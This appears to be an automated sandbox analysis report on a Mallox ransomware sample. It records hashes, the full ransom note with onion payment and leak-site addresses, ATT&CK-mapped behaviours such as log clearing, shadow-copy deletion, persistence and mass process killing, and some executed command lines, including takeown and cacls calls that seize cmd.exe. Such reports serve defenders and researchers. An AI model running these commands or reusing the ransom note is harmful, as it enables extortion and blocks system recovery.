befbb0f6ce9243f8dfbf40cec9d2c8dd829f289758b0749d8ad807bc1dd0fdb1

Resubmissions

26-04-2023 01:50

230426-b9bg3aec93 3

06-12-2022 18:46

221206-xepxvsdd29 10

06-12-2022 18:33

221206-w697fafd3y 10

Analysis

max time kernel
1617s
max time network
1621s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
06-12-2022 18:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a-Yaoofdkgd.exe
Size

12KB
MD5

2302e560d434d30be97e72035c203088
SHA1

8a018ebd03f0ea55b09fcbd602725570c7a2a4d2
SHA256

befbb0f6ce9243f8dfbf40cec9d2c8dd829f289758b0749d8ad807bc1dd0fdb1
SHA512

ab84e7c726c2dc70b535f3b0dbc6bd114bb18aff08d376ee9e166b2828464d3988fe9a9d61dbd1279d42e758305f2d4644ddab79ac31e57f13e3db66824a529e
SSDEEP

192:5r0rom3lP2KEN18VqYH5pqmnd1C7Dg5pbW1wFb/SWA0VLWx8stYcFmVc03KY:M51H5AmnCKw1vWA0VLWxptYcFmVc03K

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\FILE RECOVERY.txt

Ransom Note

Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 0FB0D508C548CF483C248FE9 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: [email protected] Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.�

Emails

[email protected]

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
2840
1156
2832	wevtutil.exe
2988
2560
2676
2916
1712
2144
2128
2524	wevtutil.exe
2448
2792
2336
1796
2480
212
2664
2420	wevtutil.exe
2256
1508
696
952
2440
2488
2208
240
2852
2316
968
108
204
2276
2260
2920
1516
284
2720	wevtutil.exe
2236
2508
2988
2576
2572
2604
596
2092
2900
2724
2572
1908
228
2208	wevtutil.exe
2684
568
2124
2948
2392
2468
2200
1508
2664
2912
1424
384

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Modifies file permissions 1 TTPs 18 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
1072	takeown.exe
1972	takeown.exe
984	takeown.exe
1464	takeown.exe
1732	takeown.exe
1544	takeown.exe
1812	takeown.exe
1984	takeown.exe
1188	takeown.exe
1184	takeown.exe
320	takeown.exe
1728	takeown.exe
1808	takeown.exe
1576	takeown.exe
984	takeown.exe
1188	takeown.exe
1188	takeown.exe
1924	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

a-Yaoofdkgd.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Xmblvnwpqgj = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mcpwdirytk\\Xmblvnwpqgj.exe\""	a-Yaoofdkgd.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

a-Yaoofdkgd.exe

description	ioc	process
File opened (read-only)	\??\W:	a-Yaoofdkgd.exe
File opened (read-only)	\??\E:	a-Yaoofdkgd.exe
File opened (read-only)	\??\G:	a-Yaoofdkgd.exe
File opened (read-only)	\??\H:	a-Yaoofdkgd.exe
File opened (read-only)	\??\M:	a-Yaoofdkgd.exe
File opened (read-only)	\??\O:	a-Yaoofdkgd.exe
File opened (read-only)	\??\V:	a-Yaoofdkgd.exe
File opened (read-only)	\??\U:	a-Yaoofdkgd.exe
File opened (read-only)	\??\X:	a-Yaoofdkgd.exe
File opened (read-only)	\??\B:	a-Yaoofdkgd.exe
File opened (read-only)	\??\F:	a-Yaoofdkgd.exe
File opened (read-only)	\??\K:	a-Yaoofdkgd.exe
File opened (read-only)	\??\L:	a-Yaoofdkgd.exe
File opened (read-only)	\??\Q:	a-Yaoofdkgd.exe
File opened (read-only)	\??\R:	a-Yaoofdkgd.exe
File opened (read-only)	\??\I:	a-Yaoofdkgd.exe
File opened (read-only)	\??\P:	a-Yaoofdkgd.exe
File opened (read-only)	\??\T:	a-Yaoofdkgd.exe
File opened (read-only)	\??\A:	a-Yaoofdkgd.exe
File opened (read-only)	\??\J:	a-Yaoofdkgd.exe
File opened (read-only)	\??\N:	a-Yaoofdkgd.exe
File opened (read-only)	\??\S:	a-Yaoofdkgd.exe
File opened (read-only)	\??\Y:	a-Yaoofdkgd.exe
File opened (read-only)	\??\Z:	a-Yaoofdkgd.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

a-Yaoofdkgd.exe

description pid process target process

PID 1672 set thread context of 1816 1672 a-Yaoofdkgd.exe a-Yaoofdkgd.exe

flow	ioc
7	api.ipify.org

description	pid	process	target process
PID 1672 set thread context of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe

Drops file in Program Files directory 64 IoCs

Processes:

a-Yaoofdkgd.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18257_.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ORG97R.SAM	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\it-IT\wmlaunch.exe.mui	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01066_.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02296_.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00241_.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21295_.GIF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\button.gif	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\ACADEMIC.ONE	a-Yaoofdkgd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\New_Skins.url	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ExpenseReport.xltx	a-Yaoofdkgd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10253_.GIF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10290_.GIF	a-Yaoofdkgd.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01241_.GIF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH.HXS	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jre7\lib\applet\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00438_.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\BUTTON.GIF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10302_.GIF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_ON.GIF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GreenTea.css	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sk\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\BTINTERNET.NET.XML	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif	a-Yaoofdkgd.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File created	C:\Program Files\Windows Media Player\it-IT\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jre7\lib\cmm\sRGB.pf	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00448_.WMF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Australia\Eucla	a-Yaoofdkgd.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1192	sc.exe
2944	sc.exe
3036	sc.exe
2200
2608
644	sc.exe
1980	sc.exe
2056	sc.exe
2312	sc.exe
2480	sc.exe
1748	sc.exe
1208	sc.exe
1324	sc.exe
1504	sc.exe
1272	sc.exe
2504	sc.exe
2104	sc.exe
3024
1356	sc.exe
1972	sc.exe
2144	sc.exe
2228	sc.exe
2560	sc.exe
2540
2116
1516	sc.exe
384	sc.exe
1520	sc.exe
1640	sc.exe
2256	sc.exe
3048	sc.exe
1188	sc.exe
212	sc.exe
1500	sc.exe
1120	sc.exe
1940
2284	sc.exe
2860	sc.exe
820	sc.exe
1712	sc.exe
2972
1604	sc.exe
1744	sc.exe
2448	sc.exe
2336	sc.exe
2572	sc.exe
1800	sc.exe
796	sc.exe
1808	sc.exe
820	sc.exe
2556	sc.exe
2292	sc.exe
2268
1516
1948	sc.exe
1792	sc.exe
1156	sc.exe
888	sc.exe
2468
1188	sc.exe
1808	sc.exe
436	sc.exe
2828
2128

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

2940 net.exe
3004 net.exe
Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1972 tasklist.exe
324 tasklist.exe
1604 tasklist.exe
108 tasklist.exe
1504 tasklist.exe
1596 tasklist.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

912 vssadmin.exe
1392 vssadmin.exe

pid	process
2940	net.exe
3004	net.exe

pid	process
1972	tasklist.exe
324	tasklist.exe
1604	tasklist.exe
108	tasklist.exe
1504	tasklist.exe
1596	tasklist.exe

pid	process
912	vssadmin.exe
1392	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2740
2908
2364
2788
1760
1908
768
2976
2920
1984
1980	taskkill.exe
2260	taskkill.exe
2408	taskkill.exe
2988	taskkill.exe
2860
3036
2520
2524
2344
2216
2996
1324	taskkill.exe
2368	taskkill.exe
2740	taskkill.exe
3028
2940
2532
2916	taskkill.exe
3000	taskkill.exe
2812
2760
2808
3036
2632
944	taskkill.exe
2488	taskkill.exe
2288
3048
2684
864
1708
2516
2800	taskkill.exe
2812
3044
2612	taskkill.exe
2824
3000
1720
2864
2184
1488
2552
1504
2608
2888
2756
2384
2220
2616
2620
2968
2368
1604	taskkill.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

a-Yaoofdkgd.exe

pid process

1816 a-Yaoofdkgd.exe

pid	process
1816	a-Yaoofdkgd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

a-Yaoofdkgd.exetakeown.exea-Yaoofdkgd.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet1.exewevtutil.exetaskkill.exetaskkill.exewevtutil.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1672	a-Yaoofdkgd.exe
Token: SeTakeOwnershipPrivilege	1184	takeown.exe
Token: SeTakeOwnershipPrivilege	1816	a-Yaoofdkgd.exe
Token: SeDebugPrivilege	1816	a-Yaoofdkgd.exe
Token: SeTakeOwnershipPrivilege	320	takeown.exe
Token: SeTakeOwnershipPrivilege	1808	takeown.exe
Token: SeTakeOwnershipPrivilege	1576	takeown.exe
Token: SeTakeOwnershipPrivilege	1812	takeown.exe
Token: SeTakeOwnershipPrivilege	1972	takeown.exe
Token: SeBackupPrivilege	1548	vssvc.exe
Token: SeRestorePrivilege	1548	vssvc.exe
Token: SeAuditPrivilege	1548	vssvc.exe
Token: SeTakeOwnershipPrivilege	1188	takeown.exe
Token: SeTakeOwnershipPrivilege	1188	takeown.exe
Token: SeDebugPrivilege	320	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	1856	taskkill.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	1320	taskkill.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	680	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	1652	taskkill.exe
Token: SeDebugPrivilege	676	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	436	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	644	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	324	tasklist.exe
Token: SeDebugPrivilege	1604	tasklist.exe
Token: SeDebugPrivilege	1504	tasklist.exe
Token: SeDebugPrivilege	1596	tasklist.exe
Token: SeDebugPrivilege	1972	tasklist.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	2380	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	2520	net1.exe
Token: SeSecurityPrivilege	2192	wevtutil.exe
Token: SeBackupPrivilege	2192	wevtutil.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	2768	taskkill.exe
Token: SeSecurityPrivilege	2796	wevtutil.exe
Token: SeBackupPrivilege	2796	wevtutil.exe
Token: SeDebugPrivilege	2740	taskkill.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	2760	taskkill.exe
Token: SeDebugPrivilege	2892	taskkill.exe
Token: SeDebugPrivilege	2924	taskkill.exe
Token: SeDebugPrivilege	2880	taskkill.exe
Token: SeDebugPrivilege	2904	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a-Yaoofdkgd.execmd.exe

description	pid	process	target process
PID 1672 wrote to memory of 1648	1672	a-Yaoofdkgd.exe	cmd.exe
PID 1672 wrote to memory of 1648	1672	a-Yaoofdkgd.exe	cmd.exe
PID 1672 wrote to memory of 1648	1672	a-Yaoofdkgd.exe	cmd.exe
PID 1672 wrote to memory of 1648	1672	a-Yaoofdkgd.exe	cmd.exe
PID 1648 wrote to memory of 536	1648	cmd.exe	reg.exe
PID 1648 wrote to memory of 536	1648	cmd.exe	reg.exe
PID 1648 wrote to memory of 536	1648	cmd.exe	reg.exe
PID 1648 wrote to memory of 536	1648	cmd.exe	reg.exe
PID 1648 wrote to memory of 1184	1648	cmd.exe	takeown.exe
PID 1648 wrote to memory of 1184	1648	cmd.exe	takeown.exe
PID 1648 wrote to memory of 1184	1648	cmd.exe	takeown.exe
PID 1648 wrote to memory of 1184	1648	cmd.exe	takeown.exe
PID 1648 wrote to memory of 1804	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1804	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1804	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1804	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 888	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 888	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 888	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 888	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1912	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1912	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1912	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1912	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1768	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1768	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1768	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1768	1648	cmd.exe	cacls.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1648 wrote to memory of 1800	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1800	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1800	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1800	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1156	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1156	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1156	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1156	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1028	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1028	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1028	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1028	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1088	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1088	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1088	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1088	1648	cmd.exe	cacls.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1672 wrote to memory of 1816	1672	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1648 wrote to memory of 1916	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1916	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1916	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1916	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 524	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 524	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 524	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 524	1648	cmd.exe	cacls.exe
PID 1648 wrote to memory of 1732	1648	cmd.exe	cmd.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

a-Yaoofdkgd.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	a-Yaoofdkgd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1"	a-Yaoofdkgd.exe

C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe
"C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Wfhvyrkill$-arab.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
3⤵
PID:536

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cmd.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1804

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /g Administrators:f
3⤵
PID:888

C:\Windows\SysWOW64\cmd.exe
